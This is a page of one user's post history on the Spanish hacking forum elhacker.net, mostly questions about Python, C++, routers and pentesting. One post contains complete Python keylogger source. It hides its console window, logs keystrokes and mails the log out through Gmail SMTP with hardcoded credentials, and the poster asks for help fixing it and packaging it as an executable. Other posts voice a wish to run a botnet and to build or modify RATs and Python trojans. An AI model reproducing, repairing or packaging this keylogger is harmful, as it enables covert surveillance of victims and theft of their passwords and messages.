elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


  Mostrar Temas
Páginas: 1 2 [3] 4
21  Programación / Scripting / python saber cuando esta prendido una pc en: 30 Julio 2019, 06:59 am
quisiera saber cual es modulo o el script para saber cuando una pc esta prendida
22  Programación / Scripting / python pesa demasiado por ser un lenguaje interpetrado en: 30 Julio 2019, 03:14 am
este comentario lo saque del foro  quisiera  ver las opiniones de unas cuantos experimentados asiendo troyanos en python

#########comentario##########

Hay algunas herramientas que te arreglan un poco este problema, como py2exe, pero lo que hacen es (más o menos) juntar el intérprete con el script y añadir a la mezcla las librerías que éste necesite. Como resultado obtendrás un servidor muy, muy pesado.

En resumen, nada te impide hacerlo como prueba de concepto, pero en la práctica es mejor programarlo en lenguajes no interpretados.

######end comentario###########
23  Comunicaciones / Redes / mantener segura mi router en: 28 Julio 2019, 04:22 am
si alguien puede darme unos tips o unas url de como mantener segura mi router   gracias
24  Programación / Scripting / error en keyloger en python en: 26 Julio 2019, 15:35 pm
tengo un problema en python   este codigo es un  keyloger  pero en la lapto de mi amigo funciona  manda los datos a  su gmail  este codigo fuente lo pongo en visual studio code  y lo vuelvo ejecutable  y lo ejecuto  no me funciona como es solo me manda a un txt no me manda al gmail  y no es el gmail  ni la contraseña porque lo e probado en otra lapto y funciona la verdad no se que es debe ser la version tengo 3.7 y mi amigo 2.7  




Código:
#!/usr/bin/env python    #interprete de ejecucion
#* coding: utf8 *


import pynput.keyboard

import smtplib #este modulo ya viene instalado por defecto en python
import time
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

import win32console
import win32gui


ventana = win32console.GetConsoleWindow()

win32gui.ShowWindow(ventana,0)


log_file = open('log.txt','w+')


##########################################################
def enviar_datos():

msg=MIMEMultipart()

password="set1enbre"

msg['From'] = "pruebakey18@gmail.com"
msg['To']="pruebakey18@gmail.com"
#Asunto
msg['Subject']="Keylogger Prueba"

msg.attach(MIMEText(file('log.txt').read()))

try:
server= smtplib.SMTP('smtp.gmail.com:587')

server.starttls()
#Ahora tenemos que logearnos en nuestra cuenta de gmail
server.login(msg['From'],password)
#Envair el correo electronico , tiene 3 parametros
#el remitente (el que envia), el que recibe , mandar el contenido del correo electronico accediento al metodo asstring
server.sendmail(msg['From'],msg['To'],msg.as_string())
server.quit()
except:
pass

def imprimir():
#convertir en una variable de texto
teclas=''.join(lista_tecla)
log_file.write(teclas)
log_file.write('\n')
log_file.close()

time.sleep(3)
enviar_datos()

lista_tecla=[]

def convertir(key):

if isinstance(key,pynput.keyboard.KeyCode):
return key.char
else:
return str(key)


#imprimir lo q el usuario teclee
def presiona(key):
key1= convertir(key)

if key1 =="Key.esc":
print("Saliendo ..")
print(key1)
imprimir()
return False

elif key1 =="Key.space":
lista_tecla.append(" ")

elif key1 =="Key.enter":
lista_tecla.append('\n')

elif key1=="Key.backspace":
pass
#Que no haga añade nada
elif key1=="Key.tab":
pass
elif key1=="Key.caps_lock":
pass

elif key1=="Key.alt_r":
pass
elif key1=="Key.shift":
pass
else :
lista_tecla.append(key1)

with pynput.keyboard.Listener(on_press=presiona) as listen:
listen.join()
#para que escuche la herramienta

#pyinstaller --onefile keylogger.py


25  Seguridad Informática / Análisis y Diseño de Malware / montar un rat uno mismo o contratar a alguien en: 28 Junio 2019, 18:24 pm
espero puedan aconsejarme tiempo que  me muero de ganas de  de poder usar una botnet pero  un brother me dijo que seria mejor que yo lo monte  porque hay bastante  codigo fuente en google y  sabes lo que hace ya no te viene con  sorpresa al descargar uno echo pero para poder montar tienes que saber un lenguaje  pero para aprender c++ me tomara meses  mejor seria si contrato a alguien que tenga mas experiencia y me ayude a montar la botnet , pero si quiero aprender c++ o python
26  Programación / Programación C/C++ / que editor usan en: 21 Junio 2019, 01:56 am
tengo una duda y pregunta a los mas experimentados cual editor usan para programar en c++ y porque
27  Programación / Programación C/C++ / error en poo cuando compilo en: 19 Junio 2019, 10:05 am
cuando compilo este code
Código:
#include<iostream>
#include<stdlib.h>
using namespace std;

class Persona{
    private:
        int edad;
        string nombre;
    public:
        Persona(int, string);
        void leer();
        void corre();
};
//constructor nos sirve para inicializar los atributos de la clase
Persona::Persona(int _edad, string _nombre){
    edad=_edad;
    nombre=_nombre;
}

void Persona::leer(){
    cout<<"soy"<<nombre<<"y estoy leendo"<<endl;
}
void Persona::corre(){
     cout<<"soy"<<nombre<<"y estoy corriendo"<<endl;
}
int main(){
    Persona p1=perror(20,"alejandro");  ->>> aca es donde me sale el error linea 27

 p1.leer();

 system("pause");
 return 0;
}


||=== Build: Debug in app (compiler: GNU GCC Compiler) ===|
||In function 'int main()':|
|27|error: invalid conversion from 'int' to 'const char*' [-fpermissive]|
|27|error: too many arguments to function 'void perror(const char*)'|
|481|note: declared here|
27|error: conversion from 'void' to non-scalar type 'Persona' requested|
||=== Build failed: 3 error(s), 0 warning(s) (0 minute(s), 0 second(s)) ===|



me sale estos tipos de errores en  Persona p1=perror(20,"alejandro");
28  Seguridad Informática / Análisis y Diseño de Malware / cuantoDemora Hacer IngeneriaInversa en: 15 Junio 2019, 21:22 pm
me gustarias  ver opiniones de gente expirementada en el tema de ingeneria Inversa cuanto demora   hacer  (I.I.) a un rat 
29  Foros Generales / Dudas Generales / en que lenguaje estan echos en: 12 Junio 2019, 19:16 pm
los rar mas usados en que lenguaje estan echos  hago esta pregunta para ver que lenguaje aprendo para hacer ingeneria inversa  y poder aprender lo interno de un rat y asi modficar algunas cosas
30  Seguridad Informática / Hacking / pentesting en: 12 Junio 2019, 18:47 pm
me gutaria saber que  tipo de tecnicas o metodos y que tipo de sofware usan para hacer pentesting a una web
Páginas: 1 2 [3] 4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines